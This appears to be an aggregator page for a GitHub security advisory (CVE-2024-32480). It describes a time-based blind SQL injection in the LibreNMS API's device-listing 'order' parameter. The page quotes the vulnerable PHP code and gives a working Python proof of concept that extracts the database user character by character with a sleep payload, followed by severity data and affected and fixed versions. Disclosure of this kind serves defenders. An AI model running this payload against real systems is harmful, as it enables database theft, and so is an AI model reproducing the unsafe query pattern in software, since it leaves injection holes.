Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1qaDU3LWozdnEtaDQzOM4AA7PQ
LibreNMS vulnerable to a Time-Based Blind SQL injection leads to database extraction
Summary
Get a valid API token, make sure you can access api functions, then replace string on my PoC code, Test on offical OVA image, it's a old version 23.9.1, but this vulerable is also exists on latest version 24.2.0
Details
in file api_functions.php, line 307 for function list_devices
$order = $request->get('order');
$type = $request->get('type');
$query = $request->get('query');
$param = [];
if (empty($order)) {
$order = 'hostname';
}
if (stristr($order, ' desc') === false && stristr($order, ' asc') === false) {
$order = 'd.`' . $order . '` ASC';
}
/* ... */
$devices = [];
$dev_query = "SELECT $select FROM `devices` AS d $join WHERE $sql GROUP BY d.`hostname` ORDER BY $order";
foreach (dbFetchRows($dev_query, $param) as $device) {
The "order" parameter is obtained from $request. After performing a string check, the value is directly incorporated into an SQL statement and concatenated, resulting in a SQL injection vulnerability.
PoC
For example. this PoC is get current db user
import string
import requests
headers = {
'X-Auth-Token': 'token_string'
}
req = requests.Session()
payloads = '_-@.,' + string.digits + string.ascii_letters
url = 'http://host/api/v0/devices?order=device_id` and if(ascii(substr(user(),%d,1))=%d,sleep(5),1) and d.`device_id'
result = 'user: '
for i in range(10):
for payload in payloads:
try:
req.get(url % (i+1, ord(payload)), headers=headers, timeout=3)
except requests.exceptions.ReadTimeout as ex:
result += payload
print(result),
except Exception as e:
pass
Impact
Attacker can extract whole database
Permalink: https://github.com/advisories/GHSA-jh57-j3vq-h438JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qaDU3LWozdnEtaDQzOM4AA7PQ
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 7 months ago
Updated: 7 months ago
CVSS Score: 7.2
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-jh57-j3vq-h438, CVE-2024-32480
References:
- https://github.com/librenms/librenms/security/advisories/GHSA-jh57-j3vq-h438
- https://github.com/librenms/librenms/commit/83fe4b10c440d69a47fe2f8616e290ba2bd3a27c
- https://nvd.nist.gov/vuln/detail/CVE-2024-32480
- https://github.com/advisories/GHSA-jh57-j3vq-h438
Blast Radius: 2.2
Affected Packages
packagist:librenms/librenms
Dependent packages: 1Dependent repositories: 2
Downloads: 51,110 total
Affected Version Ranges: < 24.4.0
Fixed in: 24.4.0
All affected versions: 1.20.1, 1.22.1, 1.30.1, 1.31.1, 1.31.2, 1.31.3, 1.32.1, 1.33.1, 1.36.1, 1.42.1, 1.48.1, 1.50.1, 1.53.1, 1.58.1, 1.62.1, 1.62.2, 1.64.1, 1.65.1, 1.70.0, 1.70.1, 21.1.0, 21.2.0, 21.3.0, 21.4.0, 21.5.0, 21.5.1, 21.6.0, 21.7.0, 21.8.0, 21.9.0, 21.9.1, 21.10.0, 21.10.1, 21.10.2, 21.11.0, 21.12.0, 21.12.1, 22.1.0, 22.2.0, 22.2.1, 22.2.2, 22.3.0, 22.4.0, 22.4.1, 22.5.0, 22.6.0, 22.7.0, 22.8.0, 22.9.0, 22.10.0, 22.11.0, 22.12.0, 23.1.0, 23.1.1, 23.2.0, 23.4.0, 23.4.1, 23.5.0, 23.6.0, 23.7.0, 23.8.0, 23.8.1, 23.8.2, 23.9.0, 23.9.1, 23.10.0, 23.11.0, 24.1.0, 24.2.0, 24.3.0
All unaffected versions: 24.4.0, 24.4.1, 24.5.0, 24.6.0, 24.7.0, 24.8.0, 24.8.1, 24.9.0, 24.9.1, 24.10.0, 24.10.1